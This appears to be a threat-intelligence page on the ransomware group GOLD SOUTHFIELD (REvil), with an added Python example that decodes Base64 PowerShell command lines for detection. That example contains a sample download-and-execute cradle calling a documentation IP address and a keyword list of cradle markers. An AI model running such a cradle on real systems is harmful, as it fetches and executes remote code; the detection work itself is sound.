GOLD SOUTHFIELD
Associated Group Descriptions

Name | Description |
---|---|
Pinchy Spider | (Citation: CrowdStrike Evolution of Pinchy Spider July 2021) |
Techniques Used

Domain | ID | Name | Use |
---|---|---|---|
Enterprise | T1059.001 | Command and Scripting Interpreter: PowerShell | GOLD SOUTHFIELD has staged and executed PowerShell scripts on compromised hosts. (Citation: Tetra Defense Sodinokibi March 2020) |
Enterprise | T1027.010 | Obfuscated Files or Information: Command Obfuscation | GOLD SOUTHFIELD has executed base64 encoded PowerShell scripts on compromised hosts. (Citation: Tetra Defense Sodinokibi March 2020) |
Enterprise | T1195.002 | Supply Chain Compromise: Compromise Software Supply Chain | GOLD SOUTHFIELD has distributed ransomware by backdooring software installers via a strategic web compromise of the site hosting Italian WinRAR. (Citation: Secureworks REvil September 2019) (Citation: Secureworks GandCrab and REvil September 2019) (Citation: Secureworks GOLD SOUTHFIELD) |
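The two PowerShell rows above (T1059.001 staged scripts and T1027.010 base64-encoded commands) describe what a responder sees in process-creation telemetry: a `powershell.exe` command line carrying `-EncodedCommand` (or one of its prefixes `-e`, `-ec`, `-enc`) followed by a Base64 blob. `powershell.exe` expects that blob to be the script encoded as UTF-16LE, so detection logic has to reverse both layers before it can look at what was actually run. The example below is an added illustration of that decode-and-inspect step; it is not code from this page or from any of the cited reports, and it assumes command lines have already been pulled out of logs (for instance the `CommandLine` field of Sysmon Event ID 1 or Security Event 4688). The marker list, the sample command lines and the `192.0.2.10` address are constructed for illustration, and only the `-` switch prefix is handled.

```python
import base64
import binascii
from dataclasses import dataclass, field
from typing import Iterable, List, Optional

# Substrings that commonly appear in staged/downloaded PowerShell payloads.
# Assumption for illustration only; not a vetted detection signature.
SUSPICIOUS_MARKERS = (
    "iex", "invoke-expression", "downloadstring", "downloadfile",
    "frombase64string", "net.webclient", "invoke-webrequest",
)


@dataclass
class EncodedCommandFinding:
    command_line: str
    decoded_script: str
    markers: List[str] = field(default_factory=list)


def encode_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def is_encoded_command_switch(token: str) -> bool:
    """True for -EncodedCommand and the abbreviations PowerShell accepts (-e, -ec, -enc, ...)."""
    t = token.lower()
    # PowerShell resolves any unambiguous prefix of a parameter name; -ex/-ep belong to
    # -ExecutionPolicy and must not match, and a bare "-" is not a switch.
    return len(t) >= 2 and t.startswith("-") and "-encodedcommand".startswith(t)


def decode_encoded_command(blob: str) -> Optional[str]:
    """Return the script behind an -EncodedCommand argument, or None if blob is not one."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not raw or len(raw) % 2:
        # UTF-16LE text is always an even number of bytes; anything else is not a
        # PowerShell encoded command (or was truncated in the log).
        return None
    try:
        return raw.decode("utf-16le")
    except UnicodeDecodeError:
        return None


def inspect_command_line(command_line: str) -> Optional[EncodedCommandFinding]:
    """Flag a powershell/pwsh command line that carries a decodable -EncodedCommand."""
    tokens = command_line.split()
    if not tokens:
        return None
    image = tokens[0].strip('"').lower()
    if "powershell" not in image and "pwsh" not in image:
        return None
    for switch, value in zip(tokens, tokens[1:]):
        if not is_encoded_command_switch(switch):
            continue
        script = decode_encoded_command(value.strip("\"'"))
        if script is None:
            continue
        low = script.lower()
        return EncodedCommandFinding(
            command_line=command_line,
            decoded_script=script,
            markers=[m for m in SUSPICIOUS_MARKERS if m in low],
        )
    return None


def scan(command_lines: Iterable[str]) -> List[EncodedCommandFinding]:
    """Run inspect_command_line over a batch of command lines and keep the hits."""
    return [f for f in (inspect_command_line(c) for c in command_lines) if f is not None]


# Constructed sample command lines (not real incident data). 192.0.2.10 is a
# documentation address; the third line stages a download-and-execute cradle.
STAGE_ONE = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage.ps1')"
SAMPLE_COMMAND_LINES = [
    r'"C:\Windows\System32\cmd.exe" /c dir C:\Users',
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Temp\inventory.ps1",
    "powershell.exe -NoP -W Hidden -enc " + encode_command(STAGE_ONE),
    # Valid Base64 but an odd number of bytes, so it cannot be UTF-16LE text.
    "powershell.exe -e " + base64.b64encode(b"not utf-16 at all").decode("ascii"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_COMMAND_LINES):
        print(finding.command_line)
        print("  decoded :", finding.decoded_script)
        print("  markers :", ", ".join(finding.markers) or "none")
```

Only the third sample line is reported: the `-File` invocation carries no encoded blob, and the last line fails the UTF-16LE length check, which is the kind of false positive a naive "any Base64 after -e" rule would raise. Decoding before matching matters because the staged payload's `DownloadString` cradle is invisible in the raw command line.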
Software

ID | Name | References | Techniques |
---|---|---|---|
S0591 | ConnectWise | (Citation: Anomali Static Kitten February 2021) (Citation: ScreenConnect) (Citation: Tetra Defense Sodinokibi March 2020) (Citation: Trend Micro Muddy Water March 2021) | Video Capture, PowerShell, Screen Capture |
S0496 | REvil | (Citation: Cylance Sodinokibi July 2019) (Citation: G Data Sodinokibi June 2019) (Citation: Group IB Ransomware May 2020) (Citation: Intel 471 REvil March 2020) (Citation: Kaspersky Sodin July 2019) (Citation: McAfee REvil October 2019) (Citation: McAfee Sodinokibi October 2019) (Citation: Picus Sodinokibi January 2020) (Citation: Secureworks GandCrab and REvil September 2019) (Citation: Secureworks REvil September 2019) (Citation: Sodin) (Citation: Sodinokibi) (Citation: Talos Sodinokibi April 2019) (Citation: Tetra Defense Sodinokibi March 2020) | Safe Mode Boot, Data Encrypted for Impact, Windows Command Shell, Disable or Modify Tools, PowerShell, Asymmetric Cryptography, Process Injection, Match Legitimate Name or Location, Modify Registry, Data Destruction, Query Registry, Visual Basic, Exfiltration Over C2 Channel, Service Stop, System Information Discovery, Native API, Malicious File, Create Process with Token, Mutual Exclusion, File and Directory Discovery, Encrypted/Encoded File, Drive-by Compromise, System Service Discovery, Windows Management Instrumentation, Deobfuscate/Decode Files or Information, Spearphishing Attachment, Ingress Tool Transfer, System Language Discovery, Token Impersonation/Theft, Web Protocols, Domain Groups, File Deletion, Inhibit System Recovery, Fileless Storage |
References
- Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.
- Tetra Defense. (2020, March). CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS. Retrieved December 14, 2020.
- Secureworks. (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.
- Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020.
- Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021.
- Meyers, Adam. (2021, July 6). The Evolution of PINCHY SPIDER from GandCrab to REvil. Retrieved March 28, 2023.